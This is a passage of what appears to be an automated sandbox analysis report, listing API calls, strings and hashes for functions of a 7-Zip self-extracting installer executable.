                                                                  • Part of subcall function 004039E7: GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                                  • Part of subcall function 004039E7: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                                  • Part of subcall function 004039E7: ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                • API String ID: 4038993085-372238525
                                                                • Opcode ID: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                                                • Instruction ID: 1d6f72d44ce7b26bafcc2ee4707833dd2b606594c716bb38fa5c6a696ed85d5e
                                                                • Opcode Fuzzy Hash: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                                                • Instruction Fuzzy Hash: 05311B7490022AAACF05EF92CD828EEBB79FF58318F10042BE810761E1DB795645DE58
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: wsprintf$ExitProcesslstrcat
                                                                • String ID: 0x%p
                                                                • API String ID: 2530384128-1745605757
                                                                • Opcode ID: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
                                                                • Instruction ID: 10afd36f4070d89f293b01a92875ce402ef2d19f58a346a7dbf4abb5c9f18492
                                                                • Opcode Fuzzy Hash: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
                                                                • Instruction Fuzzy Hash: 531182B5801208EFCB20EFB5DD85DDA73B8AF04304F00447BE645B3191D778AA948B5A
                                                                APIs
                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402E98
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EA1
                                                                  • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                  • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402EB9
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402ED9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                • String ID: SetEnvironment
                                                                • API String ID: 612612615-360490078
                                                                • Opcode ID: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                                                • Instruction ID: 9a1053b96c855abc576ef2a573940a7f22d1fb52882628247968529f0f67b02c
                                                                • Opcode Fuzzy Hash: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                                                • Instruction Fuzzy Hash: 66015276900104BADB14AB95DD819EEB7BCEF48314F10416BFD01B21D1DB786A408A99
                                                                APIs
                                                                • lstrlenW.KERNEL32(0041E3F0,00000020,?,?,?,?,?,00406547,?,?), ref: 004049C2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A74
                                                                • ??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A7C
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A8B
                                                                • ??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A93
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$lstrlen
                                                                • String ID:
                                                                • API String ID: 2031685711-0
                                                                • Opcode ID: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
                                                                • Instruction ID: d6d6aeb9fd97b078be875a6c61f5694a486b541387e48e1a0363308d58f113ad
                                                                • Opcode Fuzzy Hash: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
                                                                • Instruction Fuzzy Hash: 2E21E3B6E40205ABCF206FB5CC029EB77A8EF84355F10447BEE41B72D1E7784D858A99
                                                                APIs
                                                                  • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000B), ref: 004081F6
                                                                  • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000C), ref: 004081FF
                                                                • GetSystemMetrics.USER32(00000007), ref: 0040883F
                                                                • GetSystemMetrics.USER32(00000007), ref: 00408850
                                                                • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00408917
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$??3@
                                                                • String ID: 100%%
                                                                • API String ID: 2562992111-568723177
                                                                • Opcode ID: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                                                • Instruction ID: c0f787396fa6b3de95c2f82887938995bcf82f961e42ceb6ace71c8d1a060617
                                                                • Opcode Fuzzy Hash: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                                                • Instruction Fuzzy Hash: 51318171A007059FCB24EF6ACA459AEB7F4EF54704B00052ED982A72D1DB78FE44CB99
                                                                APIs
                                                                • lstrlenW.KERNEL32(00406EB0,00000000,?,ExecuteFile,0040454C,00000000,00000000,00406EB0,?,waitall,00000000,00000000,?,?,0041E9E8), ref: 00404512
                                                                • lstrlenW.KERNEL32(?,?,?,0041E9E8), ref: 0040451B
                                                                • _wcsnicmp.MSVCRT ref: 00404527
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$_wcsnicmp
                                                                • String ID: ExecuteFile
                                                                • API String ID: 2823567412-323923146
                                                                • Opcode ID: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                                                • Instruction ID: a2e0a5f2a3f105f817df911ac3b4dcd355adebb597ea1c4786e8ca368391ef02
                                                                • Opcode Fuzzy Hash: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                                                • Instruction Fuzzy Hash: BFE04FF25052156BC6008FA5AC84C5BBBADEAC8356B540877F700E3112E735D8198BA6
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00407200,00000000,?,?), ref: 004026BE
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004026C5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                • API String ID: 2574300362-3900151262
                                                                • Opcode ID: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                                                • Instruction ID: 82409627fcb45dd1da2fa5f3e3d8c344d82775180731f09fcf798d9da7421b86
                                                                • Opcode Fuzzy Hash: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                                                • Instruction Fuzzy Hash: D4D0A7B4593608ABD7001B62EE0CFE276A56B40701F4480356400E00F0CBFD44D1CE1E
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00402735,?,0040713A,?,00000000,?,?), ref: 004026F0
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004026F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                • API String ID: 2574300362-736604160
                                                                • Opcode ID: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                                                • Instruction ID: 4151df8360ba703b2413aa493284ccd41186626ab8f45a3e4bc2e954db12d2dd
                                                                • Opcode Fuzzy Hash: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                                                • Instruction Fuzzy Hash: C7D0C9B86936046AD6505BA6AD0DFE6B6A4AB80B02F9880296804E11E1C6FC4491DA2F
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2
                                                                  • Part of subcall function 00402DCE: MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000000,00403130,?,?,00000000,00000000,00000000), ref: 00402E00
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 1731127917-0
                                                                • Opcode ID: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                                                • Instruction ID: 048da0cb2dc02d8916bdec43440a285b354a653a086483b302c5f7621bf0cf9b
                                                                • Opcode Fuzzy Hash: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                                                • Instruction Fuzzy Hash: AD31F672804109AACB14EFA6DC829EF77BCEF04315B10443FF856B61E1EB3C9A45C668
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00407468,00000000,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048C6
                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048E3
                                                                • wsprintfW.USER32 ref: 00404919
                                                                • GetFileAttributesW.KERNEL32(?), ref: 00404934
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: PathTemp$AttributesFilewsprintf
                                                                • String ID:
                                                                • API String ID: 1746483863-0
                                                                • Opcode ID: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                                                • Instruction ID: 9a23dce76bf07ec62893e724c666a97d340ece38cae1712c454cfb59cab589fa
                                                                • Opcode Fuzzy Hash: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                                                • Instruction Fuzzy Hash: 5911E772200204BFD7119F55C845BAEB7B9FF84314F10842EF905D72E1DB79A9118B98
                                                                APIs
                                                                • _CxxThrowException.MSVCRT(00100EC3,0041C670), ref: 00412748
                                                                • ??2@YAPAXI@Z.MSVCRT(00000004,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 00412770
                                                                • memcpy.MSVCRT(00000000,0051C7C0,00000004,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?), ref: 00412799
                                                                • ??3@YAXPAX@Z.MSVCRT(0051C7C0,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 004127A4
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                • String ID:
                                                                • API String ID: 3462485524-0
                                                                • Opcode ID: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
                                                                • Instruction ID: 510514d82056c6b4fcd5a552fda661d2aed45214d42cdecf77f9d3eca8f48bd7
                                                                • Opcode Fuzzy Hash: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
                                                                • Instruction Fuzzy Hash: 0F110876200300ABCB289F16DAC0C9BF7EAAB84350720883FF569D7680C7B9ECD54758
                                                                APIs
                                                                  • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                  • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                  • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                                • GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                                • SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                                  • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                  • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                                  • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                  • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                  • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                  • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                                  • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                  • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                  • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                  • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                  • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                  • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                  • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                                  • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                • String ID:
                                                                • API String ID: 3043669009-0
                                                                • Opcode ID: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                                                • Instruction ID: 3591c2bc138905537439c0aaf451187a84050bff03ea83390e11aea9625765cd
                                                                • Opcode Fuzzy Hash: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                                                • Instruction Fuzzy Hash: B911C271F40314ABDB10EBA99D09F9A77BCAB84B04F00446FB241E32D1CAB899008B59
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00407825
                                                                • GetSystemMetrics.USER32(00000031), ref: 0040784B
                                                                • CreateFontIndirectW.GDI32(?), ref: 0040785A
                                                                • DeleteObject.GDI32(00000000), ref: 00407889
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                • String ID:
                                                                • API String ID: 1900162674-0
                                                                • Opcode ID: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                                                • Instruction ID: b25c457bbae17dd5d72c6f892d860256fe40de5a44a36179f6bad400e189aa1a
                                                                • Opcode Fuzzy Hash: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                                                • Instruction Fuzzy Hash: E4116376A00205AFDB149F54DC88BEAB7B8EB04304F0480AAED05A7391DB74AE40CB55
                                                                APIs
                                                                • ScreenToClient.USER32(?,?), ref: 00408D3B
                                                                • GetClientRect.USER32(?,?), ref: 00408D4D
                                                                • PtInRect.USER32(?,?,?), ref: 00408D5C
                                                                  • Part of subcall function 00408763: KillTimer.USER32(?,00000001,?,00408D71), ref: 00408771
                                                                • CallNextHookEx.USER32(?,?,?), ref: 00408D7E
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                • String ID:
                                                                • API String ID: 3015594791-0
                                                                • Opcode ID: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                                                • Instruction ID: 5f24f27530ec3351cfe61c109b9f8109a002e7470ac3ae9da68eaa6329551e7b
                                                                • Opcode Fuzzy Hash: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                                                • Instruction Fuzzy Hash: 23016D35101109EFDF109F55ED48EEA7BA6FF14384B18C53EF845A26A0EB35E850DB19
                                                                APIs
                                                                  • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                  • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041A834,0041A83C), ref: 0040445E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041A834,0041A83C), ref: 00404466
                                                                • SetWindowTextW.USER32(?,?), ref: 00404473
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040447E
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@TextWindow$Length
                                                                • String ID:
                                                                • API String ID: 2308334395-0
                                                                • Opcode ID: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                                                • Instruction ID: 3481eafec51d8512e57604988f767cc9cc3c1553ab35ab675722db7162792d52
                                                                • Opcode Fuzzy Hash: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                                                • Instruction Fuzzy Hash: 31F0FF76D04108BACF05BBA2DD46CDDBB7CEF18348F1040AAF50171091EA799B958B94
                                                                APIs
                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 00408094
                                                                • CreateFontIndirectW.GDI32(?), ref: 004080AA
                                                                • GetDlgItem.USER32(?,000004B5), ref: 004080BE
                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004080CA
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
